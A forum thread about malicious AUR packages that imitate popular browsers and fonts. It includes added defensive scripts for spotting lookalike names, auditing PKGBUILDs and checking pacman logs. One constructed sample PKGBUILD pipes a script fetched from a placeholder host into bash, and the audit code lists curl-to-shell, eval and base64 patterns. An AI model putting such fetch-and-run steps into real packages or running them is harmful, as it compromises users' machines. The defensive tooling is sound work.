Btw, small correction: AFAIK you're not supposed to install packages from EPEL on Fedora. Perhaps you meant COPR (basically Fedora's AUR) or Terra instead?
Getting started with EPEL (Fedora Docs)
Mwa
in reply to Voytrekk
facow [he/him, any]
in reply to Mwa
hobbsc
in reply to Xylight
lagoon8622
in reply to hobbsc
daggermoon
in reply to lagoon8622
lagoon8622
in reply to daggermoon
curl things into sh. Or downloading random exes on Windows etc.
hobbsc
in reply to lagoon8622
lagoon8622
in reply to hobbsc
balsoft
in reply to hobbsc
Ulrich
in reply to Xylight
So... did someone just create a new package cloning these, or did they somehow get into the "official" repository? Is there no attestation process?
forbiddenlake
in reply to Ulrich
Ulrich
in reply to forbiddenlake
tehn00bi
in reply to Ulrich
Ulrich
in reply to tehn00bi
HERRAX
in reply to Ulrich
jenesaisquoi
in reply to Ulrich
MentalEdge
in reply to Ulrich
MentalEdge
in reply to forbiddenlake
To be clear, when projects distribute their software via the AUR, someone else can't just issue an update using their package name.
This person appended "fix" and "patched" to appear in searches next to legitimate packages and seem worth installing instead.
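The naming trick described above (a real package's name with "fix" or "patched" spliced in so it sorts next to the legitimate result) can be checked for mechanically before you read a single PKGBUILD. The script below is an added example written for this thread, not code from the AUR or any AUR helper: it takes the names you already trust (official repo packages plus the AUR packages you installed on purpose) and classifies a list of search results. The package lists inside it are constructed for illustration, and the lure-word list and the 0.8 similarity cutoff are assumptions you should tune; it is a triage heuristic, not a verdict, so expect some false positives on legitimate "-fixed" forks.

```python
"""Lookalike-name triage for AUR search results. Added example for this
thread, not code from the AUR or any AUR helper; the package lists below
are constructed for illustration. The heuristic: an unfamiliar name that is
a known package name with a lure word (fix, patched, cracked, ...) spliced
in, or a near-miss spelling of a known name, deserves a look at its
PKGBUILD before anything else."""
from __future__ import annotations
import difflib

# Words that make a copy look like an improved version of the real thing (assumed list).
LURE_WORDS = {"fix", "fixed", "patch", "patched", "cracked"}
# Suffixes the AUR uses legitimately; stripped before comparing names.
NEUTRAL_SUFFIXES = {"bin", "git", "hg", "svn", "bzr", "nightly", "beta", "dev", "appimage"}


def base_name(name: str) -> str:
    """'foo-bin' -> 'foo', 'foo-git' -> 'foo'; 'foo-patched-bin' -> 'foo-patched'."""
    parts = name.lower().split("-")
    while len(parts) > 1 and parts[-1] in NEUTRAL_SUFFIXES:
        parts.pop()
    return "-".join(parts)


def classify(candidate: str, known: set[str]) -> tuple[str, str | None]:
    """Return (verdict, matched_known_name).

    known: names you already trust (official repos plus AUR packages you
    deliberately installed), in any -bin/-git spelling."""
    norm = {k.lower() for k in known} | {base_name(k) for k in known}
    cand = candidate.lower()
    if cand in norm:
        return "known", cand
    base = base_name(cand)
    if base in norm:
        return "variant", base               # a -git or -bin build of a known package
    parts = base.split("-")
    lures = [p for p in parts if p in LURE_WORDS]
    if lures:
        stripped = "-".join(p for p in parts if p not in LURE_WORDS)
        if stripped in norm:
            return "lure-suffix", stripped   # known name + fix/patched/...
        return "lure-word", None             # lure word, but no known name behind it
    close = difflib.get_close_matches(base, sorted(norm), n=1, cutoff=0.8)
    if close:
        return "lookalike", close[0]         # near-miss spelling of a known name
    return "unrelated", None


SUSPICIOUS = {"lure-suffix", "lure-word", "lookalike"}


def triage(candidates, known):
    """Return [(name, verdict, match)] for the names worth a closer look."""
    out = []
    for c in candidates:
        verdict, match = classify(c, known)
        if verdict in SUSPICIOUS:
            out.append((c, verdict, match))
    return out


if __name__ == "__main__":
    # Constructed lists: a few names you might trust, and search results that
    # follow the pattern described in the thread (known name + "fix"/"patched").
    known = {"firefox", "librewolf-bin", "zen-browser-bin", "ttf-ms-fonts", "vesktop-bin"}
    results = ["firefox", "firefox-bin", "firefox-fix-bin", "librewolf-patched-bin",
               "vesktop-bin-patched", "ttf-ms-fonts-all", "firef0x", "minecraft-cracked", "neovim"]
    for name, verdict, match in triage(results, known):
        print(f"{name:24} {verdict:12} looks like {match}")
```

Feed `known` from `pacman -Sl | awk '{print $2}'` plus your own `pacman -Qm` output and `results` from the AUR search you are about to install from; anything that comes back as lure-suffix or lookalike gets its PKGBUILD read first.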
Jolteon
in reply to Xylight
MentalEdge
in reply to Jolteon
Absolutely.
The Arch User Repository is a way for anyone to easily distribute software.
Hence it has never been secure, and rather than claiming it is, you mostly see people and documentation warning you about this and telling you to be careful if using it.
Any schmuck can make whatever they want available via the AUR. That's how even the tiniest niche project can often be installed via the AUR. But you trade some security for that convenience.
Derpgon
in reply to MentalEdge
It shouldn't be used as a marketplace; it should be used as a repository. You can probably find a lot of malware on GitHub; that doesn't mean you go there to choose your text editor.
I never search the AUR directly; I only use it if some README tells me I can install their software via an AUR package.
Dima
in reply to Derpgon
People need to remember it's not some carefully vetted app store, and that they need to be the ones vetting any packages they install and any changes when updating.
HaraldvonBlauzahn
in reply to Xylight
What a nice attack on privacy-friendly infrastructure.
And then, the Arch AUR has such suspicious things as the Brave browser, which claims to reduce tracking... and works together with advertisers.
To be clear, the AUR is fantastic if you develop some experimental package and you want to give it to your friends to try out easily. But not as a general distribution mechanism.
HaraldvonBlauzahn
in reply to Xylight
curl | bash install procedure and relying on TLS certificates which are e.g. issued by the Russian government. (No, the Rust project won't use a Russian/Chinese/US government certificate, but your browser will trust nearly all of them...)
Ephera
in reply to HaraldvonBlauzahn
JackbyDev
in reply to Ephera
HaraldvonBlauzahn
in reply to Ephera
wewbull
in reply to HaraldvonBlauzahn
Ephera
in reply to HaraldvonBlauzahn
Sure, I guess, if you've got a distro installed on your PC and use the distro-provided packages to install the Rust compiler, then you can't be subject to such certificate MitM attacks.
Your comment sounded like you were primarily concerned about the shell-script piping rather than it just being a program which can be downloaded without going through distro packages.
HaraldvonBlauzahn
in reply to Ephera
The AUR install scripts are just downloaded shell scripts which are executed (hopefully after inspection).
curl | bash just skips the inspection step: curl downloads to stdout, bash executes from stdin.
muusemuuse
in reply to Xylight
We are getting to the point where inviting more people in means we will need an automated babysitter to watch for this shit and to pull it once it's discovered. Apple has a walled-garden approach that's certainly taken a big chunk of malware threats out of their devices, but their walled-garden approach is ridiculous and impractical for Linux. The Microsoft method of monitoring and second-guessing everything with antimalware programs is also suspect because it is super easy to abuse and resource intensive. We have ClamAV, but clam kinda sucks.
Linux is at the point where we need something that audits what's going in and automatically yanks it back out remotely if it's found to be a problem. Things can only be added by the user, but the bot can remove them without interaction from the user.
I don't see this happening though. Instead, I see this as more of a Rust vs C thing all over again, where valid critiques are drowned out by "improve your skills bro."
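Dima's point that you are the one vetting a PKGBUILD (and its diff on every update), HaraldvonBlauzahn's reminder that a PKGBUILD is a downloaded shell script you are expected to read before makepkg runs it, and the "something that audits what's going in" muusemuuse asks for all come down to the same few questions: where does every file come from, is each one pinned by a checksum, and do the build functions fetch or run anything the source array never saw. The script below is an added example for this thread, not code from Arch, makepkg or any AUR helper. It is a read-only review aid: it never sources or executes the PKGBUILD, it only parses the arrays and function bodies with regular expressions and reports what a reviewer should look at. The PKGBUILD embedded in it is constructed (hosts under example.invalid, a "-fix-bin" name following the pattern discussed in the thread, and a patch pulled from a forge with its checksum set to SKIP); the risk patterns are assumptions to extend, and a clean report is not a guarantee that the package is safe.

```python
"""Static audit of a PKGBUILD before building it. Added example for this
thread, not code from Arch, makepkg, or any AUR helper. Read-only: it never
sources or executes the PKGBUILD. The PKGBUILD below is constructed."""
from __future__ import annotations
import re
import shlex
import sys
from urllib.parse import urlparse

CHECKSUM_ARRAYS = ("sha256sums", "sha512sums", "b2sums", "sha1sums", "md5sums")

# Shell idioms in prepare()/build()/package() worth a human look (assumed list).
# Anything downloaded inside a function bypasses the source= checksums entirely.
RISKY = [
    ("high",   r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b", "network fetch piped into a shell"),
    ("medium", r"\b(curl|wget)\b|\bgit\s+clone\b",     "network access inside a function (bypasses source checksums)"),
    ("high",   r"\beval\b",                            "eval of dynamic content"),
    ("high",   r"base64\s+(-d\b|--decode)",            "base64-decoded payload"),
    ("medium", r"\bsystemctl\b|/etc/systemd|\.service\b", "installs or enables a systemd unit"),
    ("medium", r"\$HOME\b|~/",                         "touches the home directory instead of $pkgdir"),
]


def arrays(text: str) -> dict[str, list[str]]:
    """Bash array assignments at column 0, name=( ... ) -> name -> [elements]."""
    out = {}
    for m in re.finditer(r"^(\w+)=\((.*?)\)", text, re.S | re.M):
        out[m.group(1)] = shlex.split(m.group(2))  # shlex does not expand $vars
    return out


def functions(text: str) -> dict[str, list[str]]:
    """Function bodies name -> [lines]; assumes the closing brace sits at column 0."""
    out, cur, body = {}, None, []
    for line in text.splitlines():
        m = re.match(r"^(\w+)\s*\(\)\s*\{", line)
        if cur is None and m:
            cur, body = m.group(1), []
        elif cur and line.rstrip() == "}":
            out[cur], cur = body, None
        elif cur:
            body.append(line)
    return out


def split_source(entry: str) -> tuple[str, str]:
    """'name::url' -> (name, url); a bare url keeps its basename as the name."""
    if "::" in entry:
        name, url = entry.split("::", 1)
        return name, url
    return entry.rsplit("/", 1)[-1], entry


def audit(text: str) -> list[tuple[str, str]]:
    """Return [(severity, message)] for the things a reviewer should read."""
    findings = []
    arr = arrays(text)
    sources = arr.get("source", [])
    sums = next((arr[k] for k in CHECKSUM_ARRAYS if k in arr), [])
    if sources and not sums:
        findings.append(("high", "no checksum array at all"))
    for i, entry in enumerate(sources):
        name, url = split_source(entry)
        parsed = urlparse(url)
        scheme, host = parsed.scheme, parsed.netloc
        if scheme == "":
            continue  # local file shipped next to the PKGBUILD; read it as well
        vcs = scheme.split("+")[0] in ("git", "hg", "svn", "bzr")
        if scheme in ("http", "ftp", "git+http"):
            findings.append(("high", f"source {name}: plaintext fetch from {host}"))
        checksum = sums[i] if i < len(sums) else None
        if not vcs and (checksum is None or checksum.upper() == "SKIP"):
            findings.append(("high", f"source {name}: downloaded from {host} with no checksum (SKIP)"))
        if vcs and "#" not in url:
            findings.append(("medium", f"source {name}: VCS source from {host} not pinned to a commit or tag"))
        if name.endswith((".patch", ".diff", ".sh")):
            findings.append(("info", f"source {name}: patch/script from {host}; read it before building"))
    if re.search(r"^install=", text, re.M):
        findings.append(("info", "has an .install scriptlet; read it too (it runs as root at install time)"))
    for fname, body in functions(text).items():
        if fname == "pkgver":
            continue  # git/hg commands are normal in pkgver()
        for line in body:
            for sev, pat, why in RISKY:
                if re.search(pat, line):
                    findings.append((sev, f"{fname}(): {why}: {line.strip()}"))
    return findings


# Constructed for this example; not a real AUR package.
SAMPLE_PKGBUILD = r"""
pkgname=examplebrowser-fix-bin
pkgver=1.2.3
pkgrel=1
arch=('x86_64')
install=examplebrowser.install
source=("examplebrowser-${pkgver}.tar.gz::https://downloads.example.invalid/examplebrowser-${pkgver}.tar.gz"
        "fix.patch::https://forge.example.invalid/someone/somerepo/raw/branch/main/fix.patch")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000'
            'SKIP')

prepare() {
  cd "$srcdir"
  patch -p1 < fix.patch
  curl -fsSL https://forge.example.invalid/someone/somerepo/raw/branch/main/setup.sh | bash
}

package() {
  install -Dm755 examplebrowser "$pkgdir/usr/bin/examplebrowser"
}
"""

if __name__ == "__main__":
    # Usage: python audit_pkgbuild.py [PKGBUILD]; with no argument the constructed sample is audited.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PKGBUILD
    for sev, msg in audit(text):
        print(f"[{sev}] {msg}")
```

On the constructed sample this reports the unchecked patch, the script fetched and piped into bash inside prepare(), and the presence of an .install scriptlet, while the checksummed tarball and the plain package() produce nothing. Run it on the PKGBUILD an AUR helper shows you, and again on the diff when the package updates, since a version bump is exactly when a second source or a new line in prepare() tends to appear.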
mazzilius_marsti
in reply to muusemuuse
oo1
in reply to Xylight
I already assumed the AUR was riddled with stuff like that.
Use a condom when fucking around in there.
AceFuzzLord
in reply to Xylight
Gotta assume that if any Arch users actually fell for that one, they either let their kids use their device or they're generally not smart (which absolutely goes against my stereotypical view of an Arch user).
pfr
in reply to AceFuzzLord
moseschrute
in reply to pfr
I had no idea that existed, but I've just returned from r/unixporn. There are some sick setups. Also, we all copy. My entire neovim config is copied and modified from a couple dozen setups I admired. Nothing wrong with copying things you like. Don't gatekeep Linux.
However… Minecraft cracked is pretty funny lol.
lattrommi
in reply to moseschrute
I agree that gatekeeping is no good and people should not do that.
However...
I do not feel that assuming all people copy should be done either, in my opinion.
pfr
in reply to lattrommi
lattrommi
in reply to pfr
I don't know if there is a word for what I was trying to point out.
Like an opposite to gatekeeping, sort of.
I do not like it when people use 'we' in ways that include people it does not apply to. Lumping everyone together inaccurately into a group.
teawrecks
in reply to Xylight
mazzilius_marsti
in reply to Xylight
The Firefox, Zen Browser and LibreWolf packages are concerning. The ttf ms font one too. Those are very normal apps, and unless you pay attention to the package name when doing "pacman -Syu", you would fall for the malware.
If only we could compartmentalize all AUR packages. The downloaded AUR sources IIRC are already in something like $HOME/.paru. Installing is a different story, because these packages can put their executables all over the place: /usr/local/bin, $HOME/local/bin.
Cysio
in reply to mazzilius_marsti
At this point you'll be reinventing Flatpak.
SayCyberOnceMore
in reply to mazzilius_marsti
With respect, you wouldn't install these by just doing an update, so pacman -Syu is fine. You would have needed to install these manually, or a package that depended on them (both from the AUR), so you'd also need to use yay (etc.) to install them. But I totally agree with your point that the names look innocent enough for someone to install those over other packages.
Always look at the AUR (website) at the package details: if it's new(ish) and has 0 or 1 votes, then be suspicious.
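Because, as noted above, these packages can only arrive through an explicit install (an AUR helper ends up running pacman -U on the built package), pacman's own log is the quickest way to answer the "did I install one of these, and when" question: /var/log/pacman.log records every `Running 'pacman ...'` invocation and every `installed`/`upgraded`/`removed` event with a timestamp. The script below is an added example for this thread, not Arch's tooling: it takes a one-name-per-line list of bad package names (the same shape as the vulnerable_packages.txt file redxef mentions further down), the output of `pacman -Qq`, and the pacman.log text, and reports which listed packages are present, which were present and since removed, when each first landed, and through which pacman command. The IOC list, package list and log lines embedded in it are constructed so that it runs offline; point it at the real files on a system you are checking.

```python
"""Post-incident triage for a list of known-bad package names. Added example
for this thread, not Arch's own tooling: it consumes `pacman -Qq` output and
the /var/log/pacman.log line format, and answers which listed packages are
(or were) installed, since when, and through which pacman command.
All inputs below are constructed; on a real system feed it the real files."""
from __future__ import annotations
import re
import sys
from pathlib import Path

LOG_LINE = re.compile(r"^\[([^\]]+)\] \[(ALPM|PACMAN)\] (.*)$")
EVENT = re.compile(r"^(installed|reinstalled|upgraded|removed) (\S+) \((.*)\)$")


def load_list(text: str) -> set[str]:
    """One package name per line; blank lines and '#' comments are ignored."""
    names = set()
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            names.add(line)
    return names


def installed_hits(pacman_qq_output: str, bad: set[str]) -> list[str]:
    """Listed packages that are installed right now (from `pacman -Qq`)."""
    return sorted(load_list(pacman_qq_output) & bad)


def log_events(log_text: str, bad: set[str]) -> list[tuple]:
    """(timestamp, action, package, version, command) for every log event on a
    listed package. `command` is the last 'Running ...' line seen before the
    event, i.e. the pacman invocation that caused it (an AUR helper shows up
    as pacman -U on a locally built package)."""
    events, last_cmd = [], None
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ts, source, rest = m.groups()
        if source == "PACMAN" and rest.startswith("Running "):
            last_cmd = rest[len("Running "):].strip().strip("'")
            continue
        e = EVENT.match(rest)
        if e and e.group(2) in bad:
            events.append((ts, e.group(1), e.group(2), e.group(3), last_cmd))
    return events


def status(events) -> dict[str, tuple[str, str]]:
    """package -> ('present' | 'removed', timestamp of its first appearance)."""
    out = {}
    for ts, action, pkg, _version, _cmd in events:
        first = out[pkg][1] if pkg in out else ts
        out[pkg] = ("removed" if action == "removed" else "present", first)
    return out


# Constructed sample data (hypothetical package names, hosts and paths).
BAD_LIST = "# constructed IOC list, one package per line\nexamplebrowser-fix-bin\nexamplefonts-all\n"
INSTALLED = "bash\nexamplebrowser-fix-bin\nfirefox\nlinux\n"
PACMAN_LOG = """\
[2025-07-16T21:05:41+0200] [PACMAN] Running 'pacman -S firefox'
[2025-07-16T21:05:44+0200] [ALPM] installed firefox (140.0-1)
[2025-07-16T22:13:02+0200] [PACMAN] Running 'pacman -U /home/user/.cache/yay/examplebrowser-fix-bin/examplebrowser-fix-bin-1.2.3-1-x86_64.pkg.tar.zst'
[2025-07-16T22:13:05+0200] [ALPM] installed examplebrowser-fix-bin (1.2.3-1)
[2025-07-17T09:00:10+0200] [PACMAN] Running 'pacman -Syu'
[2025-07-17T09:01:30+0200] [ALPM] upgraded firefox (140.0-1 -> 140.0.1-1)
[2025-07-17T09:30:00+0200] [PACMAN] Running 'pacman -U /home/user/.cache/yay/examplefonts-all/examplefonts-all-1-1-any.pkg.tar.zst'
[2025-07-17T09:30:02+0200] [ALPM] installed examplefonts-all (1-1)
[2025-07-18T18:20:00+0200] [PACMAN] Running 'pacman -R examplefonts-all'
[2025-07-18T18:20:01+0200] [ALPM] removed examplefonts-all (1-1)
"""

if __name__ == "__main__":
    # Usage: python triage.py IOC_LIST PACMAN_QQ_OUTPUT [PACMAN_LOG]; no args runs the sample.
    if len(sys.argv) >= 3:
        bad = load_list(Path(sys.argv[1]).read_text())
        qq = Path(sys.argv[2]).read_text()
        log = Path(sys.argv[3] if len(sys.argv) > 3 else "/var/log/pacman.log").read_text()
    else:
        bad, qq, log = load_list(BAD_LIST), INSTALLED, PACMAN_LOG
    print("installed now:", installed_hits(qq, bad))
    for ts, action, pkg, ver, cmd in log_events(log, bad):
        print(f"{ts} {action:10} {pkg} {ver}  via: {cmd}")
    for pkg, (state, first) in status(log_events(log, bad)).items():
        print(f"{pkg}: {state}, first seen {first}")
```

The first-seen timestamp is the start of the window in which anything the package's install scriptlet or binaries did should be treated as untrusted; a listed package that shows as removed is not an all-clear, since removal only undoes what pacman tracked, not what a scriptlet or the running binary wrote elsewhere.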
redxef
in reply to Xylight
With vulnerable_packages.txt containing one package name per line.
Matt
in reply to Xylight